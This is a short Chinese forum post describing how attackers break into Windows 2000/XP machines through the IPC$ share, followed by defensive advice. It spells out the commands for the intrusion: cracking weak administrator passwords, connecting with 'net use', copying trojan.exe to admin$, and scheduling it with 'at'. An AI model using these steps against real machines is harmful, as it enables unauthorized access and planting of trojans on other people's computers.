[分享]ipc$共享入侵
<p>微软在win2000,xp中设置的这个功能对个人用户来说几乎毫无用处。反而成了黑客入侵nt架构操作系统的一条便利通道。如果你的操作系统存在不安全的口令,那就更可怕了。一条典型的入侵流程如下: </p><p>(1)用任何办法得到一个帐户与口令(猜测,破解),网上流传有一个叫做smbcrack的软件就是利用ipc$来破解帐户口令的。如果你的密码位数不高,又很简单,是很容易被破解的。根据我的个人经验,相当多的人都将administrator的口令设为123,2003,或者干脆不设密码。 </p><p>(2)使用命令net use <a href="file://\\xxx.xxx.xxx.xxx\ipc$">\\xxx.xxx.xxx.xxx\ipc$</a>“密码” /user:“用户名”建立一个有一定权限的ipc$连接。用copy trojan.exe <a href="file://\\xxx.xxx.xxx.xxx\admin$">\\xxx.xxx.xxx.xxx\admin$</a> 将木马程序的服务器端复制到系统目录下。</p><p>(3)用net time <a href="file://\\xxx.xxx.xxx.xxx">\\xxx.xxx.xxx.xxx</a> 命令查看对方操作系统的时间,然后用at <a href="file://\\202.xxx.xxx.xxx">\\202.xxx.xxx.xxx</a> 12:00 trojan.exe 让trojan.exe在指定时间运行。 </p><p>这样一来,你的电脑就完全被黑客控制了。 </p><p>应对措施:禁用server服务, Task Scheduler服务,去掉网络文件和打印机共享前的对勾(插入图1), </p><p>当然,给自己的帐户加上强壮的口令才是最关键的。 <br/></p>